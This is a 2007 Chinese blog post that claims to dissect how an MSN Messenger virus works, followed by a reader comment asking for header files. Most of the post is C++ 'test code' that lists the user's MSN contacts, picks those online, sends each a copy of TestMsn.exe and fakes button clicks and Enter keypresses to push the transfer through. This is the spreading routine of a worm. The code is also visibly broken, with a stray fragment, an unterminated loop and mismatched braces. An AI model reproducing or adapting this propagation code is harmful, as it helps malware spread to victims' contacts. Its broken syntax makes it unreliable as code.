一步一步解剖MSN病毒及分析原理（附测试代码）

2007-03-10 12:22:32

前段时间网络上MSN病毒非常流行，它的原理其实很简单，HOHO！最主要的工作就是实现了操控MSN，其实这个很简单,微软早就有公开的接口让你使用，所以我在这里就不多说了，直接进入正题，HOHO！

　　下面是测试代码,只有通过MSN传送文件部分

CODE:
　#include "stdafx.h"
　#include <stdio.h>
　#include <windows.h>
　#include "msgruaid.h" //这两个头文件就是接口的定义
　#include "msgrua.h" //有兴趣的同学可以在网上找找(没找着可以找我要)
　#include <comutil.h>

　int main(int argc, char* argv[])
　{
　　IMessenger *pIMessenger = NULL; //a pointer to an IMessenger interface BSTR pbstrName, bstrFriendName;
　　IMessengerContact *MsnContact;
　　IMessengerContacts *MsnContacts;
　　IMessengerWindow *pIMsnWindow;
　　__MIDL___MIDL_itf_msgrua_0000_0002 dwStatus;
　　VARIANT vaTemp;
　　BSTR bstrFileName;
　　char *szOpenDlg;
　　char szMsnWindowsClass[] = "IMWindowClass";
　　char szButtonText[] = "打开(&O)";
　　HWND hWnd = NULL, hBtn = NULL;
　　DWORD dwControlId = 0;
　　char szCurDir[MAX_PATH], szBuf[MAX_PATH];

　　CoInitialize(0); //初始化COM库
　　CoCreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&pIMessenger); //创建一个实例
　　pIMessenger->get_MyContacts((IDispatch**)&MsnContacts); //取得好友列表
　　pIMessenger->get_Window((IDispatch**)&pIMsnWindow);
　　long nCount;
　　MsnContacts->get_Count(&nCount); //得到好友数
　　for (int i = 0; i < nCount; i++)
　　{
　　　MsnContacts->Item(i, (IDispatch**)&MsnContact);
　　　MsnContact->get_SigninName(&pbstrName); //账号
　　　MsnContact->get_FriendlyName(&bstrFriendName); //签名
　　　szOpenDlg = _com_util::ConvertBSTRToString(bstrFriendName);
　　　MsnContact->get_Status(&dwStatus);
　　　if (dwStatus == MISTATUS_ONLINE) //判断是否在线
　　　{
　　　　GetCurrentDirectory(MAX_PATH, szCurDir);
　　　　lstrcat(szCurDir, "\\");
　　　　lstrcat(szCurDir, "TestMsn.exe");
　　　　lstrcpy(szBuf, "发送文件给 ");
　　　　lstrcat(szBuf, szOpenDlg);
　　　　bstrFileName = _com_util::ConvertStringToBSTR(szCurDir);
　　　　vaTemp.vt = VT_BSTR;
　　　　vaTemp.bstrVal = pbstrName;
　　　　pIMessenger->SendFile(vaTemp, bstrFileName, (IDispatch**)&pIMsnWindow); //发送文件
　　　　do
　　　　{
　　　　　hWnd = FindWindow(NULL,szBuf);
　　　　　hBtn = FindWindowEx(hWnd, NULL, NULL, szButtonText);
　　　　　& hBtn));
　　　　　dwControlId <<= 16;
　　　　　dwControlId |= 1;
　　　　　PostMessage(hWnd, WM_COMMAND, (WPARAM)dwControlId,(LPARAM)&(hBtn));
　　　　　keybd_event(VK_RETURN, 0, 0, 0);
　　　　　keybd_event(VK_RETURN, 0, KEYEVENTF_KEYUP, 0);

　　　　}
　　　　MsnContact->Release();
　　　　MsnContacts->Release();
　　　　pIMessenger->Release(); //释放相关资源
　　　　CoUninitialize();
　　　　ExitProcess(0);
　　　　return 0;
　}

本文出自 “大唐网络” 博客，请务必保留此出处http://redking.blog.51cto.com/27212/19936

上一篇金蝶K3实现自动核算（供应商管理单价）　　下一篇无法卸载K/3处理方法

类别：Security ┆ 技术圈() ┆ 阅读() ┆ 评论() ┆推送到技术圈 ┆返回首页

相关文章

文章评论

qkl12345

2007-06-07 09:21:37

　#include "msgruaid.h" //这两个头文件就是接口的定义
　#include "msgrua.h" //有兴趣的同学可以在网上找找(没找着可以找我要)
麻烦打包发个给我感谢了呵呵 80508567@qq.com

昵称：
验证码：		点击图片可刷新验证码　　博客过2级，无需填写验证码
内容：